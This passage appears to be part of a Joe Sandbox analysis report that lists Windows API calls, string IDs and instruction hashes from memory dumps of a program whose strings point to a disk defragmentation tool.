                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F51D5B3C006555BE728CA28CDD9AEABB79EB50308F0542BAE90E5A580D73D5FC48E41
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5832c10c76a503e9a85356905cf93c2ddb7a004c06b6a20f67111e80e155f7e7
                                                                                                                                                                                                                                                                                                • Instruction ID: 3665b7449f4d170db1c228802c273e752dcebb0474082da94558a54a5cde6ba4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5832c10c76a503e9a85356905cf93c2ddb7a004c06b6a20f67111e80e155f7e7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2519EB1A002058FEB25CF69D9997AEBBF0FB48310F59843AC405EB2A0D3749D80CF50
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_111392827.jbxd
APIs
  • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
  • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75A7AF60), ref: 0041DB8A
• SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
• SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
  • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
• LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
• SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
• SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
  • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                                • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                                • API String ID: 3599163918-2734650818
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                                • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                                • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                                • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                                • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                                • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                                • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                                • String ID: 4$COMBOBOX
                                                                                                                                                                                                                                                                                                • API String ID: 3327461832-2064896087
                                                                                                                                                                                                                                                                                                • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2611688555
                                                                                                                                                                                                                                                                                                • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0041A2A5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A7B0: CloseHandle.KERNEL32(?,0041A113), ref: 0041A7BB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A770: CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                                • EnumWindows.USER32 ref: 0041A2F2
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041A2FD
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041A310
                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(Function_00019F90,?), ref: 0041A34F
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041A35A
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 0041A372
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$CreateEnumWindows$BrushCloseForegroundHandleMessageMutexSendSolid
                                                                                                                                                                                                                                                                                                • String ID: -BootTimeDefrag$8<$DiskDefrag$Foucs_Color$Frame_Color$Mid_Back_Color$Select_Color$Text_Color$Window
                                                                                                                                                                                                                                                                                                • API String ID: 2433303760-2309799116
                                                                                                                                                                                                                                                                                                • Opcode ID: 70afbaaa209b5f4c0eb50287e16e1692c40512dff5ed34459b4bb6cb62927c05
                                                                                                                                                                                                                                                                                                • Instruction ID: 9fe1ff023ffd13c005f793ce9add20bfadde0b2b9dc18c99357dbdc95238beea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70afbaaa209b5f4c0eb50287e16e1692c40512dff5ed34459b4bb6cb62927c05
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45417470654340BBD710BB608C86FAF76A4AF44704F10482EF559A22C1DBB9A5588B6B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 0040AEFA
                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000048), ref: 0040AF5E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Object
                                                                                                                                                                                                                                                                                                • String ID: CharSet$ClipPrecision$Escapement$Italic$Name$Orientation$OutPrecision$PitchAndFamily$Quality$Size$StrikeOut$Underline$Weight
                                                                                                                                                                                                                                                                                                • API String ID: 2936123098-848768055
                                                                                                                                                                                                                                                                                                • Opcode ID: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                                • Instruction ID: 678cc5ad66024a4e3a2d6689a74d43ebfb952ff3fe0b92c748617c9598e0b8bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E021371508740DFD360DF61C984B5BB7F9EB88304F108A2EF98A87291D778A944CFA6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,1088D068), ref: 004215AC
                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401097$ScheduleStart$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1016491994-4255795148
                                                                                                                                                                                                                                                                                                • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                                • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                                • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                                • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                                • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                                • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                                • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                                • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                                • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                                • String ID: &$>=
                                                                                                                                                                                                                                                                                                • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                                • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000328,?,00000000), ref: 00453F69
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453FDE
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454016
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328,00000000,00000000), ref: 00454026
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454057
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 00454066
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?), ref: 00454071
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540A7
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                                • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                                • Opcode ID: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                                • Instruction ID: dcbbcf768856184cb3fb00598b231148ced9fb8d52ef67d3d26bd90cee913ac4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA616C72608300AFC310DF69D88196BF7E4FFD8711F804A2EF55987291EB759848CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00453C29
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453C9B
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453CD3
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045B451), ref: 00453CE3
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453D14
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00453D23
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00453D2E
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00453D64
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00453D94
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                                • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                                • Opcode ID: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e319efc0b140ea32d15ab3920dd7af36ea307e7c4a1d425a09acf6eef36fbe0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9617BB2608300AFC314DF69DC8196BF7F4EFD8751F804A2EF55983251E77599088B9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040ED30
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040EDD3
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EDF9
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040EE67
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040EE77
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0040EEEE
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 0040EFD9
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 0040F00C
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0040F073
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
